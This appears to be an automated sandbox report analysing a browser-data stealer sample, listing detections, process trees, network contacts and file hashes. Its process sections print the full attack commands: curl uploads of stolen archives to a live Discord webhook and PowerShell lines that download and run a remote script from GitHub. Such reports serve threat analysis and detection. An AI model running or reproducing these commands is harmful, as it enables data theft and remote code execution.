Malware Analysis Report

2025-03-15 00:02

Sample ID 250117-gzv2lsvrcm
Target 9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7.zip
SHA256 9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7
Tags
execution hackbrowserdata discovery spyware stealer
score
10/10


Analysis Overview

score
10/10

SHA256

9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7

Threat Level: Known bad

The file 9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7.zip was found to be: Known bad.

Malicious Activity Summary

execution hackbrowserdata discovery spyware stealer

An open source browser data exporter written in golang.

Hackbrowserdata family

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Unsigned PE

Browser Information Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-01-17 06:15

Signatures

An open source browser data exporter written in golang.

Description Indicator Process Target
N/A N/A N/A N/A

Hackbrowserdata family

hackbrowserdata

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral10

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

146s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3828 wrote to memory of 1908 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 1908 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 1292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 1292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\bdata.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\e.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\exclude.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\file.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\grab.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\m.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\svhost.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

Network

Country Destination Domain Proto
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 86.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 181.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ffo1zloo.uww.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\bdata.zip

MD5 e38d77d89d87d9dc6975a8c52049ba18
SHA1 6aee028ef6d2327233466e51dd4c293a28cd43c4
SHA256 658991e9ec65890494a0e7051d41f79f2c7fbba978e64cf577c552d1089f295d
SHA512 ebfaaac981a1189864503526de626ae49de3ded78ab464c31fc441e866e894aca10817c7c96a35ee5d113dfc7aaf3ef619205abe9a4b1fafeb1c2ed9e85bf637

C:\Users\Admin\AppData\Local\Temp\e.zip

MD5 9a8e90d4abda1500466b8970c6a36982
SHA1 057b038c0a91654f5a51e45deb94247e0d7c5e3d
SHA256 214b9a2f9f18be94fb5ce10b3e4007099d56df2a9978a2175af9fd98c375b7e2
SHA512 abe05046effb8903a2dcf711ce302a26967e7fa34b9c9488bebaf1aafe0842745488e84417987ab4f2aaffbde8e2dddb4f6116f23124cb5bcfcf3c9c376c1a7e

C:\Users\Admin\AppData\Local\Temp\exclude.zip

MD5 f868c684d24aa6e8c3a1451e00016900
SHA1 b7c2370e5d4d886df82456708d9e9b6553939286
SHA256 ea0301e41e0222f736260bebcdf5250fdd6283854837a6c3356221b554e96244
SHA512 a83e08de2506c61af0fe933265273f05164bcc30e90500c09b518e6b9238330d0cf2db21915b4f4bb0c09f50f41e6b3fcc73a3d883aaa42f4dc60ac4926faa43

C:\Users\Admin\AppData\Local\Temp\file.zip

MD5 7ed554c7a827ba84c1d340fe966a2db9
SHA1 ca39dd825b902a3c853d170312b89a3198e0d67f
SHA256 6d06797176b04baf550c01724281cc1d1ab5b40d18314c00eb3ae767775ca99c
SHA512 0490283cba37a2c2cda88976ada55b81a967c6ccd5373445007f7c72f96205cd33bf54341ab298a077a947da8f4d66c387dc0e1ef0ada99505aac40e66d5187d

C:\Users\Admin\AppData\Local\Temp\grab.zip

MD5 0632e6262f80957d689873cd171ef4eb
SHA1 59ebd357f65af9b6923c93f4a5d2ab959f674ca9
SHA256 5384b0d039f2a3c0a2d0c76aaea6f02f53af13f10d1b059932fbfd686e72f84e
SHA512 54b7e19fb935fc55f2be6ceb6bbe6205f51c299406db83cd9e14472c89f6be0ff33ab1a217c203d3d873b9d0392c09b8fec7f92012d2a91446998b8ab6b0fb69

C:\Users\Admin\AppData\Local\Temp\m.zip

MD5 3e9da8af20794b88518123e7726a1090
SHA1 d41b522d24cb6d0860702d0fd89b12ec6bcbe056
SHA256 c984bc8481dc293ba634a76b05f875feda1adaf346fb5d977ff12d6f284443d6
SHA512 862021501b0af52bc31f1f71d1136eb6dc586f425a586c5e7b3af433d34b3cc7bbfcc5e4e12f0526c4652f972d12518d59075285c40ca968b9930fb74ceefe42

C:\Users\Admin\AppData\Local\Temp\svhost.zip

MD5 2b554843f7216d4fc3966daf6a8d113e
SHA1 ee38847558c8d215357c512d952a3081dd582aea
SHA256 66d56f48c653b00867af782c7fa90e33213270f2c54b9eeb744058fe2f54e17f
SHA512 f258ef8eb692a7e21ab64cfe80f0e27f82706cbbf97d1aeec3b6fbd34855d9b76ba6fb1796c4e9265e7f5e25aa55c1b6026e369a00aebaeab49eec8d5ff57328

Analysis: behavioral13

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$script = iwr http://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1; invoke-expression $script"

Network

N/A

Files

Analysis: behavioral3

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240729-en

Max time kernel

118s

Max time network

119s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\e.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\e.ps1

Network

N/A

Files

Analysis: behavioral7

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2996 wrote to memory of 2308 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2996 wrote to memory of 2308 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2996 wrote to memory of 2308 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1').Content"

Network

N/A

Files

Analysis: behavioral8

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

150s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3156 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3156 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1').Content"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mrz2raz5.qay.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral9

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240903-en

Max time kernel

118s

Max time network

119s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1

Network

N/A

Files

Analysis: behavioral12

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\m.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\m.ps1

Network

Country Destination Domain Proto
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 181.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 34.197.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_42ttdnm0.inb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral14

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3240 wrote to memory of 1672 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3240 wrote to memory of 1672 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$script = iwr http://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1; invoke-expression $script"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:80 raw.githubusercontent.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 8.153.16.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2oi2u0te.pny.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral11

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240708-en

Max time kernel

134s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\m.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\m.ps1

Network

Country Destination Domain Proto
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp

Files

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240729-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe

"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

138s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\e.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\e.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/4388-0-0x00007FFF66363000-0x00007FFF66365000-memory.dmp

memory/4388-1-0x000001459B590000-0x000001459B5B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zox3i0nt.io2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4388-11-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp

memory/4388-12-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp

memory/4388-15-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
